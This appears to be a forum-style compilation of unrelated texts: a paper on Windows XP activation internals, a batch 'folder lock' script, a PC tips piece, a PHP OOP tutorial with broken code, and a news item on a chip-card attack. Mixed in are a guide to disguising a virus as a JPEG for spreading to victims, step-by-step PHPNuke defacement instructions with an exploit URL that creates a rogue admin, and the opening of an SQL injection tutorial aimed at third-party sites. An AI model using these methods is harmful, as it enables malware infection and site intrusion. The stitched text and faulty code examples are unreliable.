Inside Windows Product Activation - Algorithm Explanation

The current public discussion of Windows Product Activation (WPA) is
characterized by uncertainty and speculation. In this paper we supply
the technical details of WPA - as implemented in Windows XP - that
Microsoft should have published long ago.

While we strongly believe that every software vendor has the right to
enforce the licensing terms governing the use of a piece of licensed
software by technical means, we also do believe that each individual
has the right to detailed knowledge about the full implications of the
employed means and possible limitations imposed by it on software
usage.

In this paper we answer what we think are currently the two most
important open questions related to Windows Product Activation.

* Exactly what information is transmitted during activation?

* How do hardware modifications affect an already activated
installation of Windows XP?

Our answers to these questions are based on Windows XP Release
Candidate 1 (build 2505). Later builds as well as the final version of
Windows XP might differ from build 2505, e.g. in the employed
cryptographic keys or the layout of some of the data
structures.

However, beyond such minor modifications we expect Microsoft to cling
to the general architecture of their activation mechanism. Thus, we
are convinced that the answers provided by this paper will still be
useful when the final version of Windows XP ships.

This paper supplies in-depth technical information about the inner
workings of WPA. Still, the discussion is a little vague at some
points in order not to facilitate the task of an attacker attempting
to circumvent the license enforcement supplied by the activation
mechanism.

XPDec, a command line utility suitable for verifying the presented
information, can be obtained from http://www.licenturion.com/xp/. It
implements the algorithms presented in this paper. Reading its source
code, which is available from the same location, is highly
recommended.

We have removed an important cryptographic key from the XPDec source
code. Recompiling the source code will thus fail to produce a working
executable. The XPDec executable on our website, however, contains
this key and is fully functional.

So, download the source code to learn about the inner workings of WPA,
but obtain the executable to experiment with your installation of
Windows XP.

We expect the reader to be familiar with the general procedure of
Windows Product Activation.

>> INSIDE THE INSTALLATION ID

We focused our research on product activation via telephone. We did
so, because we expected this variant of activation to be the most
straight-forward to analyze.

The first step in activating Windows XP via telephone is supplying the
call-center agent with the Installation ID displayed by msoobe.exe,
the application that guides a user through the activation process. The
Installation ID is a number consisting of 50 decimal digits that are
divided into groups of six digits each, as in

002666-077894-484890-114573-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XX

In this authentic Installation ID we have substituted digits that we
prefer not to disclose by 'X' characters.

If msoobe.exe is invoked more than once, it provides a different
Installation ID each time.

In return, the call-center agent provides a Confirmation ID matching
the given Installation ID. Entering the Confirmation ID completes the
activation process.

Since the Installation ID is the only piece of information revealed
during activation, the above question concerning the information
transmitted during the activation process is equivalent to the
question

'How is the Installation ID generated?'

To find an answer to this question, we trace back each digit of the
Installation ID to its origins.

>>> Check digits

The rightmost digit in each of the groups is a check digit to guard
against simple errors such as the call center agent's mistyping of one
of the digits read to him or her. The value of the check digit is
calculated by adding the other five digits in the group, adding the
digits at even positions a second time, and dividing the sum by
seven. The remainder of the division is the value of the check
digit. In the above example the check digit for the first group (6) is
calculated as follows.

1 | 2 | 3 | 4 | 5 <- position
---+---+---+---+---
0 | 0 | 2 | 6 | 6 <- digits

0 + 0 + 2 + 6 + 6 = 14 (step 1: add all digits)
0 + 6 + 14 = 20 (step 2: add even digits again)

step 3: division
20 / 7 = 2, remainder is 20 - (2 * 7) = 6

=> check digit is 6

Adding the even digits twice is probably intended to guard against the
relatively frequent error of accidentally swapping two digits while
typing, as in 00626 vs. 00266, which yield different check digits.

>>> Decoding

Removing the check digits results in a 41-digit decimal number. A
decimal number of this length roughly corresponds to a 136-bit binary
number. In fact, the 41-digit number is just the decimal encoding of
such a 136-bit multi-precision integer, which is stored in little
endian byte order as a byte array. Hence, the above Installation ID
can also be represented as a sequence of 17 bytes as in

0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX
0x94 0xAA 0x46 0xD6 0x0F 0xBD 0x2C 0xC8
0x00

In this representation of the above Installation ID 'X' characters
again substitute the digits that we prefer not to disclose. The '0x'
prefix denotes hex notation throughout this paper.

>>> Decryption

When decoding arbitrary Installation IDs it can be noticed that the
most significant byte always seems to be 0x00 or 0x01, whereas the
other bytes look random. The reason for this is that the lower 16
bytes of the Installation ID are encrypted, whereas the most
significant byte is kept in plaintext.

The cryptographic algorithm employed to encrypt the Installation ID is
a proprietary four-round Feistel cipher. Since the block of input
bytes passed to a Feistel cipher is divided into two blocks of equal
size, this class of ciphers is typically applied to input blocks
consisting of an even number of bytes - in this case the lower 16 of
the 17 input bytes. The round function of the cipher is the SHA-1
message digest algorithm keyed with a four-byte sequence.

Let + denote the concatenation of two byte sequences, ^ the XOR
operation, L and R the left and right eight-byte input half for one
round, L' and R' the output halves of said round, and First-8() a
function that returns the first eight bytes of an SHA-1 message
digest. Then one round of decryption looks as follows.

L' = R ^ First-8(SHA-1(L + Key))
R' = L

The result of the decryption is 16 bytes of plaintext, which are -
together with the 17th unencrypted byte - from now on interpreted as
four double words in little endian byte order followed by a single
byte as in

name | size | offset
-----+-------------+-------
H1 | double word | 0
H2 | double word | 4
P1 | double word | 8
P2 | double word | 12
P3 | byte | 16

H1 and H2 specify the hardware configuration that the Installation ID
is linked to. P1 and P2 as well as the remaining byte P3 contain the
Product ID associated with the Installation ID.

>>> Product ID

The Product ID consists of five groups of decimal digits, as in

AAAAA-BBB-CCCCCCC-DDEEE

If you search your registry for a value named 'ProductID', you will
discover the ID that applies to your installation. The 'About' window
of Internet Explorer should also yield your Product ID.

>>>> Decoding

The mapping between the Product ID in decimal representation and its
binary encoding in the double words P1 and P2 and the byte P3 is
summarized in the following table.

digits | length | encoding
--------+---------+---------------------------------------
AAAAA | 17 bits | bit 0 to bit 16 of P1
BBB | 10 bits | bit 17 to bit 26 of P1
CCCCCCC | 28 bits | bit 27 to bit 31 of P1 (lower 5 bits)
| | bit 0 to bit 22 of P2 (upper 23 bits)
DDEEE | 17 bits | bit 23 to bit 31 of P2 (lower 9 bits)
| | bit 0 to bit 7 of P3 (upper 8 bits)

The meaning of each of the five groups of digits is documented in the
next table.

digits | meaning
--------+-------------------------------------------------
AAAAA | apparently always 55034 (in Windows XP RC1)
BBB | most significant three digits of Raw Product Key
| (see below)
CCCCCCC | least significant six digits of Raw Product Key
| plus check digit (see below)
DD | index of the public key used to verify the
| Product Key (see below)
EEE | random value

As can be seen, the (Raw) Product Key plays an important role in
generating the Product ID.

>>>> Product Key

The Raw Product Key is buried inside the Product Key that is printed
on the sticker distributed with each Windows XP CD. It consists of
five alphanumeric strings separated by '-' characters, where each
string is composed of five characters, as in

FFFFF-GGGGG-HHHHH-JJJJJ-KKKKK

Each character is one of the following 24 letters and digits:

B C D F G H J K M P Q R T V W X Y 2 3 4 6 7 8 9

Very similar to the decimal encoding of the Installation ID the 25
characters of the Product Key form a base-24 encoding of the binary
representation of the Product Key. Decoding the Product Key yields a
multi-precision integer of roughly 115 bits, which is stored - again
in little endian byte order - in an array of 15 bytes. Decoding the
above Product Key results in the following byte sequence.

0x6F 0xFA 0x95 0x45 0xFC 0x75 0xB5 0x52
0xBB 0xEF 0xB1 0x17 0xDA 0xCD 0x00

Of these 15 bytes the least significant four bytes contain the Raw
Product Key in little endian byte order. The least significant bit is
removed by shifting this 32-bit value (0x4595FA6F - remember the
little endian byte order) to the left by one bit position, resulting
in a Raw Product Key of 0x22CAFD37, or

583728439

in decimal notation.

The eleven remaining bytes form a digital signature, allowing
verification of the authenticity of the Product Key by means of a
hard-coded public key.

>>>> Product Key -> Product ID

The three most significant digits, i.e. 583, of the Raw Product Key's
nine-digit decimal representation directly map to the BBB component of
the Product ID described above.

To obtain the CCCCCCC component, a check digit is appended to the
remaining six digits 728439. The check digit is chosen such that the
sum of all digits - including the check digit - is divisible by
seven. In the given case, the sum of the six digits is

7 + 2 + 8 + 4 + 3 + 9 = 33

which results in a check digit of 2, since

7 + 2 + 8 + 4 + 3 + 9 + 2 = 33 + 2 = 35

which is divisible by seven. The CCCCCCC component of the Product ID
is therefore 7284392.

For verifying a Product Key, more than one public key is available. If
verification with the first public key fails, the second is tried,
etc. The DD component of the Product ID specifies which of the public
keys in this sequence was successfully used to verify the Product Key.

This mechanism might be intended to support several different parties
generating valid Product Keys with different individual private keys.

However, the different private keys might also represent different
versions of a product. A Product Key for the 'professional' release
could then be signed with a different key than a Product Key for the
'server' release. The DD component would then represent the product
version.

Finally, a valid Product ID derived from our example Product Key might
be

55034-583-7284392-00123

which indicates that the first public key (DD = index = 0) matched and
123 was chosen as the random number EEE.

The randomly selected EEE component is the reason for msoobe.exe
presenting a different Installation ID at each invocation. Because of
the applied encryption this small change results in a completely
different Installation ID.

So, the Product ID transmitted during activation will most probably
differ in the last three digits from your Product ID as displayed by
Internet Explorer or as stored in the registry.

>>> Hardware Information

As discussed above, the hardware configuration linked to the
Installation ID is represented by the two double words H1 and H2.

>>>> Bit-fields

For this purpose, the double words are divided into twelve
bit-fields. The relationship between the computer hardware and the
bit-fields is given in the following table.

double word | offset | length | bit-field value based on
------------+--------+--------+----------------------------
H1 | 0 | 10 | volume serial number string
| | | of system volume
H1 | 10 | 10 | network adapter MAC address
| | | string
H1 | 20 | 7 | CD-ROM drive hardware
| | | identification string
H1 | 27 | 5 | graphics adapter hardware
| | | identification string
H2 | 0 | 3 | unused, set to 001
H2 | 3 | 6 | CPU serial number string
H2 | 9 | 7 | harddrive hardware
| | | identification string
H2 | 16 | 5 | SCSI host adapter hardware
| | | identification string
H2 | 21 | 4 | IDE controller hardware
| | | identification string
H2 | 25 | 3 | processor model string
H2 | 28 | 3 | RAM size
H2 | 31 | 1 | 1 = dockable
| | | 0 = not dockable

Bit 31 of H2 specifies, whether the bit-fields represent a notebook
computer that supports a docking station. If docking is possible, the
activation mechanism will be more tolerant with respect to future
hardware modifications. Here, the idea is that plugging a notebook
into its docking station possibly results in changes to its hardware
configuration, e.g. a SCSI host adapter built into the docking station
may become available.

Bits 2 through 0 of H2 are unused and always set to 001.

If the hardware component corresponding to one of the remaining ten
bit-fields is present, the respective bit-field contains a non-zero
value describing the component. A value of zero marks the hardware
component as not present.

All hardware components are identified by a hardware identification
string obtained from the registry. Hashing this string provides the
value for the corresponding bit-field.

>>>> Hashing

The hash result is obtained by feeding the hardware identification
string into the MD5 message digest algorithm and picking the number of
bits required for a bit-field from predetermined locations in the
resulting message digest. Different predetermined locations are used
for different bit-fields. In addition, a hash result of zero is
avoided by calculating

Hash = (Hash % BitFieldMax) + 1

where BitFieldMax is the maximal value that may be stored in the
bit-field in question, e.g. 1023 for a 10-bit bit-field, and 'x % y'
denotes the remainder of the division of x by y. This results in
values between 1 and BitFieldMax. The obtained value is then stored in
the respective bit-field.

>>>> RAM bit-field

The bit-field related to the amount of RAM available to the operating
system is calculated differently. The seven valid values specify the
approximate amount of available RAM as documented in the following
table.

value | amount of RAM available
------+---------------------------
0 | (bit-field unused)
1 | below 32 MB
2 | between 32 MB and 63 MB
3 | between 64 MB and 127 MB
4 | between 128 MB and 255 MB
5 | between 256 MB and 511 MB
6 | between 512 MB and 1023 MB
7 | above 1023 MB

It is important to note that the amount of RAM is retrieved by calling
the GlobalMemoryStatus() function, which reports a few hundred
kilobytes less than the amount of RAM physically installed. So, 128 MB
of RAM would typically be classified as "between 64 MB and 127 MB".

>>>> Real-world example

Let us have a look at a real-world example. On one of our test systems
the hardware information consists of the following eight bytes.

0xC5 0x95 0x12 0xAC 0x01 0x6E 0x2C 0x32

Converting the bytes into H1 and H2, we obtain

H1 = 0xAC1295C5 and H2 = 0x322C6E01

Splitting H1 and H2 yields the next table in which we give the value
of each of the bit-fields and the information from which each value is
derived.

dw & | |
offset | value | derived from
-------+-------+-----------------------------------------------
H1 0 | 0x1C5 | '1234-ABCD'
H1 10 | 0x0A5 | '00C0DF089E44'
H1 20 | 0x37 | 'SCSI\CDROMPLEXTOR_CD-ROM_PX-32TS__1.01'
H1 27 | 0x15 | 'PCI\VEN_102B&DEV_0519&SUBSYS_00000000&REV_01'
H2 0 | 0x1 | (unused, always 0x1)
H2 3 | 0x00 | (CPU serial number not present)
H2 9 | 0x37 | 'SCSI\DISKIBM_____DCAS-34330______S65A'
H2 16 | 0x0C | 'PCI\VEN_9004&DEV_7178&SUBSYS_00000000&REV_03'
H2 21 | 0x1 | 'PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01'
H2 25 | 0x1 | 'GenuineIntel Family 6 Model 3'
H2 28 | 0x3 | (system has 128 MB of RAM)
H2 31 | 0x0 | (system is not dockable)

>>> Using XPDec

XPDec is a utility to be run from the command prompt. It may be
invoked with one of four command line options to carry out one of four
tasks.

>>>> XPDec -i

This option enables you to access the information hidden in an
Installation ID. It decodes the Installation ID, decrypts it, and
displays the values of the hardware bit-fields as well as the Product
ID of your product. Keep in mind that the last three digits of the
Product ID contained in the Installation ID are randomly selected and
differ from the Product ID displayed by Internet Explorer.

The only argument needed for the '-i' option is the Installation ID,
as in

XPDec -i 002666-077894-484890-114573-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XX

>>>> XPDec -p

To help you trace the origin of your Product ID, this option decodes a
Product Key and displays the Raw Product Key as it would be used in a
Product ID.

The only argument needed for the '-p' option is the Product Key, as in

XPDec -p FFFFF-GGGGG-HHHHH-JJJJJ-KKKKK

Note that this option does not verify the digital signature of the
Product Key.

>>>> XPDec -v

This option calculates the hash of a given volume serial number. It
was implemented to illustrate our description of string hashing. First
use '-i' to display the hardware bit-fields. Then use this option to
verify our claims concerning the volume serial number hash.

The only argument needed for the '-v' option is the volume serial
number of your system volume, as in

XPDec -v 1234-ABCD

(The volume serial number is part of the 'dir' command's output.)

>>>> XPDec -m

This option calculates the network adapter bit-field value
corresponding to the given MAC address. Similar to '-v' this option
was implemented as a proof of concept.

The only argument needed for the '-m' option is the MAC address of
your network adapter, as in

XPDec -m 00-C0-DF-08-9E-44

(Use the 'route print' command to obtain the MAC address of your
network adapter.)

>> HARDWARE MODIFICATIONS

When looking at the effects of hardware modifications on an already
activated installation of Windows XP, the file 'wpa.dbl' in the
'system32' directory plays a central role. It is a simple
RC4-encrypted database that stores, among other things like expiration
information and the Confirmation ID of an activated installation,

a) the bit-field values representing the current hardware
configuration,

and

B) the bit-field values representing the hardware configuration
at the time of product activation.

While a) is automatically updated each time the hardware configuration
is modified in order to reflect the changes, B) remains fixed. Hence,
B) can be thought of as a snapshot of the hardware configuration at
the time of product activation.

This snapshot does not exist in the database before product activation
and if we compare the size of 'wpa.dbl' before and after activation,
we will notice an increased file size. This is because the snapshot is
added to the database.

When judging whether re-activation is necessary, the bit-field values
of a) are compared to the bit-field values of B), i.e. the current
hardware configuration is compared to the hardware configuration at
the time of activation.

>>> Non-dockable computer

Typically all bit-fields with the exception of the unused field and
the 'dockable' field are compared. If more than three of these ten
bit-fields have changed in a) since product activation, re-activation
is required.

This means, for example, that in our above real-world example, we
could replace the harddrive and the CD-ROM drive and substantially
upgrade our RAM without having to re-activate our Windows XP
installation.

However, if we completely re-installed Windows XP, the information in
B) would be lost and we would have to re-activate our installation,
even if we had not changed our hardware.

>>> Dockable computer

If bit 31 of H2 indicates that our computer supports a docking
station, however, only seven of the ten bit-fields mentioned above are
compared. The bit-fields corresponding to the SCSI host adapter, the
IDE controller, and the graphics board are omitted. But again, of
these remaining seven bit-fields, only up to three may change without
requiring re-activation.

>> CONCLUSIONS

In this paper we have given a technical overview of Windows Product
Activation as implemented in Windows XP. We have shown what
information the data transmitted during product activation is derived
from and how hardware upgrades affect an already activated
installation.

Looking at the technical details of WPA, we do not think that it is as
problematic as many people have expected. We think so, because WPA is
tolerant with respect to hardware modifications. In addition, it is
likely that more than one hardware component map to a certain value
for a given bit-field. From the above real-world example we know that
the PX-32TS maps to the value 0x37 = 55. But there are probably many
other CD-ROM drives that map to the same value. Hence, it is
impossible to tell from the bit-field value whether it is a PX-32TS
that we are using or one of the other drives that map to the same
value.

In contrast to many critics of Windows Product Activation, we think
that WPA does not prevent typical hardware modifications and,
moreover, respects the user's right to privacy.

How To Lock a Folder Without Using any Software

Simple Copy-Paste-Rename-Store-and LOCK. can work anywhere on any computer.

NO Software Required. Simple Lock your Folder, with these Few Steps. Ive tried it, and works great. Ive only tried it on Windows Xp, SP2.
IM not sure, if it works on other OS as well. but its harmless, so try it out.

Steps:

1- make a new folder ( name it as you like )

2- inside this folder make a ( TXT ) file & copy inside it this (the entire thing)

Code:

Quote:
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

3- After u copy the Commanding go to line 23 (or try using shortcut- CTRL+F and type password to locate the line) u will find this word : password here (Change it with any password u like.) is :

eg: if NOT %pass%== narnia1234 goto FAIL
//so ur password here becomes narnia1234 .//

4- After that go to ‘save as’ & name this file as "locker.bat "

5- Now back to the folder & u will find a ( LOCKER ) commanding.
(locker.exe)

6- Double Click on it & u will find a new folder (Private )

7- Ok ,, now copy what u want in this "private Folder" & after that come out of the folder, and Double click on locker again. It will open and ask if you want to lock your folder? Y/N ?

8- Type Y. your private folder will dissapear.

9- If you want to UNLOCK your folder ,go to (locker) & type your pass and you will see your private folder.

it not only hides the fodler, but incase, u unhide all files... and try opening it without entering password, it'l take u to the control panel...

Also, if u want to store files on your Pen-Drive, u can use this script. No Software Required

Incase u delete your Locker file (just in case), then u can make a new one (but with the same password) and open it from that.

Alternatively, u can keep this locker file somewhere else, and when u want to open ur folder, only then bring it back to that place...

Hide any file inside a picture

1) Create your virus. We shall call it 'server1.exe' for now.

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - undies@live.com'.

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial.

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.

Hackers Reveal hacking method Chip Card

To be more secure, ATM card is expected to be changed to chip-based system.
However, a security researcher has found it
method of breaking into the chip-based cards.

The results were disclosed in the annual Black Hat Conference
which was held in Washington D.C., United States. This finding is
horrendous
because the previous chip-based system is considered very, very safe and
almost impenetrable.

Is a researcher named Christopher Tarnovsky of the Flylogic Engineering
managed to find a way to break the chip-based cards. He also expressed
weaknesses of that technology to the public.

Managed to break the chip Tarnovsky Infineon SLE 66 CL PE called many
used in computers, game systems, identity cards and electronic items
another. However, as quoted from DarkReading, Wednesday (3/2/2010),
Tarnovsky presented method is quite complicated and expensive.

"I'm not saying it's cheap, but this technology is not as safe as the
heralded the vendors, "said Tarnovsky.

Process conducted in breaking Tarnovsky chip card is enough
complicated. That process requires analysis by electron microscopy, making
a
'map' to penetrate the security of the card and then sticking a needle super
refined to obtain the data in it.

Bobolnya security chip card does not mean that efforts to replace ATM card
This technology does not need to be continued. This is because the method of breaking into the chip card
far
more complicated than breaking into the security by means of magnetic cards
'simple' like a Skimmer.

Tarnovsky claims his method can be used to break into chips made
other vendors. As a form of responsibility, had earlier Tarnovsky
notify
This method of Infineon, as the chip maker, and Trusted Platform Module
(TPM) security standardization organizations as chips.

In the chip Tarnovsky break takes nine months and
spend hundreds of dollars. "It takes a long time not because of what
committed by the vendor, but because I am still learning how.
After knowing how, not be that difficult anymore, "Tarnovsky asserted.

Object-oriented Programming Techniques With Php

Introduction
This tutorial starts from my experience watching my friends at university
the learning object-oriented programming. But they did not understand the way
what & how the object-oriented programming. This happened to me
probably due to too many theories but little or even no example
concrete so that they are confused.
So in this tutorial I tried to give an explanation as possible
and more with concrete examples so it is easy to understand. This tutorial
introduce you to the object-oriented programming (Object Oriented
Programming) by using PHP5.
This tutorial requires a lot of improvement, therefore, if you have
questions or input for the improvement of this tutorial, please send an email to author
the gerrysabar (at) gmail.com. Input you provide is very useful
for the development of this tutorial to better & useful.

What is OOP?
Or object-oriented programming in English is called the Object
Oriented Programming (hereinafter abbreviated as OOP) is a programming technique that
using the object. This object-oriented programming has the ability to
hide what is not important for its users. In this short tutorial
I use PHP5 because PHP5 has a feature-oriented programming
objects are more complete than previous versions.
Why should use OOP?

If you make a small-scale program of course the obvious benefit of this OOP
less felt. But when a project program medium to large scale
it will show how important the use of OOP.
Perhaps you are thinking right now after all the new beginners learn to create what if OOP OOP
more shown in the project program making medium to large scale.
Maybe for now for those of you who are still novices in programming yet
feels, but if you are from now has a good basic understanding
about OOP then when it came time for you to deepen your OOP
already have preparation.
Therefore, in this tutorial I did not even make you become an expert in
OOP. This tutorial is more indicated that you have a good understanding
about OOP.

Creating Objects
An initial step in OOP is the making of objects where the object itself comes
class. Therefore let us first make the class. To create a class in
in PHP you use the keyword class. In the next example we will
create a class Emailer.

<?php
class Emailer
{}
?>

In the above example we create a class called Emailer. In making
class, first we use the class keyword followed by the name
class. Then end with curly braces. Inside the curly braces we
write down the codes so that these classes work as we want.
As you can see, in the example code above we do not enter codes
anything that Emailer class is not doing any work.
Existing code in the class is divided into two groups, namely property and
method. Property is a storage container in the classroom that can
accommodate the information. The simple property can be referred to as a variable in
in the classroom. While the method is a function in the classroom. Now
Let us give a property and two-class method in Emailer.
Thus, the code would look like:

<?php
class Emailer
{
private $EmailAddress; //property
public function getEmailAddress() //method
{
echo $this->$EmailAddress
}
public function setEmailAddress()
{
$this->$EmailAddress;
}
}
?>

For now ignore the keyword public first, private, and $ this is seen
in the code above. We'll discuss it later. In the above example we
add a property named emailaddress that will be used
to accommodate e-mail address. Then we also added two
method, the first named getEmailAddress which serves to show
content emailaddress property. The second is a working setEmailAddress
to enter an email address to the property emailaddress.

Using Class
Class codes should be in the PHP script that uses these classes.
Often classes are created are stored in different files and then
inserted by using the keywords include when necessary in the script
PHP.
To use an object, you first must create the object of a class.
In this context the Emailer class. Creating an object from a class in
English is called instantiating. To make objects in PHP, we
using the new keyword. Setting the sentence is as follows::

$ObjeckName = new ClassName( );

In the following code we will create an object of class Emailer

<?php
class Emailer
{
private $EmailAddress; //property
public function getEmailAddress() //method
{
$this->$EmailAddress
}
public function setEmailAddress()
{
return $this->$EmailAddress;
}
}
//example make objeck in PHP
$emailerObject = new Emailer();
?>

Using Object
We have created a class and create objects from these classes. Now
let's experiment a little with the objects we have created. In code
just created, we have created a property and two class method
Emailer. To use an existing method on an object it must be
used operator -> which then followed with a method that would
used. Here is an example to use the method:

<?php
class Emailer
{
private $EmailAddress; //property
public function getEmailAddress() //method
{
return $this->$EmailAddress;
}
public function setEmailAddress($emailName)
{
$this->$EmailAddress = $emailName;
}
}
//example make objeck in PHP
$emailerObject = new Emailer();
//menggunakan method
$emailerObject->setEmailAddress(username@example.com);
echo $emailerObject->getEmailAddress();
?>

When the code is run it will display text on username@example.com
web browser screen. This is one example of object-oriented programming
simplest. Where you use an object in the PHP script
you.
Public and Private
Perhaps the earlier you have to wonder what the public & private
There Emailer class. Property and the existing method in the class can have
public or private nature (there is still one more that is protected, but will be discussed
the next tutorial).
What is the difference between the two? Private means the method or property in
in a class can only be accessed in the class. While the method or
which are public property means the method or property can be accessed at
within and outside the classroom. In the previous code example, we see property
EmailAddres is private. Now we try to property is accessed from outside
emailerObject object, so the code would look like the following:

<?php
class Emailer
{
private $EmailAddress; //property
public function getEmailAddress() //method
{
return $this->$EmailAddress;
}
public function setEmailAddress($emailName)
{
$this->$EmailAddress = $emailName;
}
}
//example make objeck in PHP
$emailerObject = new Emailer();
//mengakses property dari luar objek
$emailerObject->EmailAddress = "username@example.com";
?>

When the code above is run will display the following error message:
Fatal error: Can not access private property Emailer:: $ emailaddress in
C: \ xampp \ htdocs \ gerry \ practice \ test.php on line 21
Consider changing your emailaddress become public property, then run the code again,
then the error message will not appear.

Encapsulation
Encapsulation or in English known as encapsulation is
mechanism to bind the code with the data so that the code dimanipulasinya
and the data contained within it safe from outside interference. Combining the data and
method in a class is called encapsulation. In the previous code example
you just do encapsulation:

<?php
class Emailer
{
private $EmailAddress; //property
public function getEmailAddress() //method
{
return $this->$EmailAddress;
}
public function setEmailAddress($emailName)
{
$this->$EmailAddress = $emailName;
}
}
//example make objeck in PHP
$emailerObject = new Emailer();
?>
$this

Now we are at the end of this short tutorial. Last discussions
is the operator $ this. In a class, $ this is a special variable
to access an existing property in the class being used. $ this
can not be used outside the classroom. Use $ this format is as follows:
$ this-> namavariabel
encapsulation
In sebelunya sample code, the class has a property emailaddress Emailer. You
emailaddress can access the following property:
$ this-> emailaddress
By using $ this to access the property, you can perform various
operations against the emailaddress as follows:
$ this-> emailaddress = "example@example.com";
$ this-> emailaddress = $ UserEmail;
ArrayEmail [$ this-> emailaddress] = $ UserEmail;
Note the dollar sign ($), when you begin using the variable name
variable with a dollar sign. In the example above $ UserEmail. But when
use $ this-> then the variable or property can not use sign
dollars. Such errors often occur at PHP programmers who are still
beginners. But with consistent training, basic errors like this will
disappear by itself.

Method
Method defines what can be done by the object. This method is made in
in the classroom. Easy method is a function (function) in the classroom or
object. In the previous code example you've created two method of
getEmailAddress and setEmailAddress.
To use the method, just as you must use the property
operator -> that the previous code example when you use the method
getEmailAddress and setEmailAddress, the code you typed is as
follows:
$ emailerObject-> setEmailAddress (username@example.com);
echo $ emailerObject-> getEmailAddress ();

Exercise

How to Improve Your Computer Slow to Fast

Are you looking for ways to repair system slowdown to get your computer to run faster? There are a few useful solutions that may help. High speed and efficiency of the computer should be satisfied to all computer users.

Speed up your Windows system by following methods given below:

The first way: Clean up the duplicate files. There might be a large number of duplicate files separated around your computer. They take a lot of resources of your computer and slow down your system running. Repair system slowdown by removing the duplicate files and free up precious space on your hard disk.

The second way: Free up your hard disk. Disk comes with the ability to record, catalog and treat a set of instructions or data as a single unit. It stores all resources of Windows system. Over time, the hard disk will be overloaded. This makes the computer run slowly and slowly. Therefore, defragment the hard disk to free up valuable disk space and recoup system resources is the most effective method to repair system slowdown problem and speed up your computer performance.

The third way: Fix Windows registry errors. The Windows registry is a central hierarchical database that comes to store information and settings for users, applications and hardware devices. Once your Windows registry is corrupted or bloated, your computer will absolutely slow down. What is worse, there could be blue screen of death. It is the most important for you to fix registry errors by cleaning up the invalid and corrupted registry entries in your system to repair system slowdown problem. Don't manually try to change the registry unless you are definitely professional with the operation. Otherwise, your system will become corrupted and crashed. The best way is to use the registry cleaner to repair the registry errors.

Deface PHPNuke site

Here you must own efforts to find his targets.
His steps:
1. www.target.com / nuke / index.php or www.target.com / PHPNuke / index.php
2. www.target.com / nuke / admin.php => yg above was converted to the admin.php
3. Enter this bug behind this site:
? AddAuthor & op = J4mbi & add_aid = add_name = God & H4ck3r & add_pwd = add_email =
junkelse@live.com & add_radminsuper = 1 & admin = eCcgVU5JT04gU0VMRUNUIDEvKjox

For example: www.target.com / nuke / admin.php?

op = AddAuthor & J4mbi & add_aid = add_name = God & H4ck3r & add_pwd = add_
email = junkelse@live.com & add_radminsuper = 1 & admin = eCcgVU5JT04gU0VMRUNUIDEvKjoxKalau not want
've meant the site admin on his same path.

But if successful, then the url / browsing appears www.target.com/nuke/admin.php?op=mod_author
5. Enter your id & password was. Remember? antecedent see this!
username: J4mbi
password: H4ck3r
6. When it went into "Administration Menu" that site. Mengusai dictionary meaning is that the site now.

Now you select the image Mobile (no writing underneath Messages).
Column Title: Hacked by nick name you
Column Content: Path your web! <br> Hey admin ....... do you a need help? <br> Junkelse
<br> <br> <img src="http://www.finagro.gov.co/902.gif">
Column Expiration: Unlimited
Continue click Add Messages tab are below.
7. If you've, open url / new browsing and then type this target site, for example him:

www.target.com / nuke / index.php or www.target.com / PHPNuke / index.php. If it is not no results

try clicking Refresh tab imaginable in addition to the above url / browsing.

SQL Injection Tutorial by Junkelse (MySQL)

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).

1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)

So let's start with some action :D

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

